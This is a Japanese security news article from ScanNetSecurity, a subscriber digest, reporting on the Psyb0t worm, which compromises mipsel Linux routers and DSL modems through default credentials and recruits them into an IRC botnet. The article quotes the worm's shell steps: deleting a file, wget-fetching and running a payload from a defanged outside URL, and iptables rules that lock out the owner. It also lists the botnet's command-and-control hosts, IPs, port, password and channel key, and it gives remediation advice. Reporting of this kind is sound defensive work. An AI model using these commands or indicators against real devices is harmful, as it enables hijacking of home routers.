SCAN DISPATCH :インフラ攻撃(1) 初のルータとDSLモデムを攻撃するボットネット・ワーム | ScanNetSecurity[国内最大級のサイバーセキュリティ専門ポータルサイト]
2018.01.23(火)

SCAN DISPATCH :インフラ攻撃(1) 初のルータとDSLモデムを攻撃するボットネット・ワーム

国際 海外情報

 SCAN DISPATCH は、アメリカのセキュリティ業界及ハッカーコミュニティから届いたニュースを、狭く絞り込み、深く掘り下げて掲載します。

──

 ダン・カミンスキーがDNSプロトコルの脆弱性を指摘してから一年ほど経つ。もともと学術用として開発されたインターネットで使用されているプロトコルの多くは、大幅なアップデートもされることなく現在でも使用されている。インターネットというインフラ自体の脆弱性をカミンスキー氏は指摘した訳だが、今回と次回の2回にわたって、インフラを対象とした新種の攻撃をレポートしたい。

 まずは、Psyb0t(サイボット)と呼ばれるルータ専用のワーム。ルータを攻撃対象としたボットネット・ワームはこれが初めてで、このワームは最初、主にオーストラリアで販売されているルータ Netcomm NB5に感染していることが発見され、1月にTerry Baume氏が論文を書いている。その後、攻撃に脆弱性を持つのは、「Linux mipselのルータで、ルータ管理インターフェイスがあるか、DMZにsshdかtelnetdができ、ユーザーネームとパスワードがデフォルトであるなど弱い組み合わせであるもの」ということが分かっている。mipselとは、MIPSがlittle-endian modeで動作しているもので、OpenWRT and DD-WRTなどのカスタムファームウェアを動作させているものも危ない。

 現在までに10万台のモデムが被害にあっていると、感染マシンの乱用を阻止することを目的にIPアドレスをリアルタイムで監視しているDroneBLでは推測している。

 さてその感染方法だが、まずワームはユーザーネームとパスワードを、ブルートフォース、パケット検査等の数種類の攻撃方法を使用して手に入れる。次にshellを使用する。そして

# rm -f /var/tmp/udhcpc.env
# wget

して、wget がある場合 hxxp://dweb.webhop.net/.bb/udhcpc.env をダウンロードしてこれを走らす。wget がない場合は、 "busybox ftpget" を探し出してtftpクライアントを使い、同様に上記プログラムをダウロードする。そして、

# iptables -A INPUT -p tcp ─dport 23 -j DROP
# iptables -A INPUT -p tcp ─dport 22 -j DROP
# iptables -A INPUT -p tcp ─dport 80 -j DROP

して、ユーザーをルータから排除する。

 これで分かるように、ルータが感染された症状としてポート23, 22, 80がブロックされてしまう。これらのポートがブロックされていたら、Psyb0tの感染と疑い、ルータをハードリセットし、パスワードを変更して最新のファームウェアにアップデートすることが必要だ。

 さて、一度ルータが感染されると、そのルータはIRCボットネットになってしまう。

Command and control server: strcpy.us.to
IP: 207.155.1.5 (master controller, Windstream Communications AS16687)
IP: 202.67.218.33 (backup controller? HKnet/REACH AS?????)
Port: 5050
Password: $!0@
Channel: #mipsel
Key: %#8b
NickPattern: [NIP]-[A-Z/0-9]{9}
BotController: DRS
DroneURL: hxxp://nenolod.net/~nenolod/psyb0t/udhcpc.env (backup copy, i did not write it)

 このPsyb0tについて、1月に論文を書いたTerry Baume氏によれば、
strcpy.us.toのサーバーは

strcpy.us.to = 202.71.102.110 (Malaysia)
strcpy.us.to = 202.67.218.33 (Hong Kong)
strcpy.us.to = 216.199.217.170 (USA)
strcpy.us.to = 207.155.1.5 (USA)

らのラウンドロビンになっているそうだ。

 オーストラリアのパーソナルコンピュータマガジン Apcmag では、最新のバージョン18では、30種類のLynksys、10種類のNetgear、そしてその他15種類のケーブルやDSLモデムのシェルコードを内蔵しているとレポートしており、ブルートフォース用のユーザーネームが全部で6,000個、パスワードも13,000個も含まれていたそうだ。

 さて面白いことに、このボットネット感染劇には以下のように、3月22日に終わっている…

【執筆:米国 笠原利香】

【関連リンク】
Terry Baume氏論文
http://www.adam.com.au/bogaurd/PSYB0T.pdf
DroneBLブログ
http://www.dronebl.org/blog/
APC Magazine記事
http://apcmag.com/Content.aspx?id=3687
Dan Kaminskyブログ
http://www.doxpara.com/?p=1283
──
※ この記事は Scan購読会員向け記事をダイジェスト掲載しました
購読会員登録案内 http://www.ns-research.jp/cgi-bin/ct/p.cgi?w02_ssw
《ScanNetSecurity》

Scan PREMIUM 会員限定記事

もっと見る

Scan PREMIUM 会員限定記事特集をもっと見る

カテゴリ別新着記事

★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★
<b>★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★</b>

経営課題としてサイバーセキュリティに取り組む情報システム部門や、研究・開発・経営企画に携わる方へ向けた、創刊19年のセキュリティ情報サービス Scan PREMIUM を、貴社の事業リスク低減のためにご活用ください。

×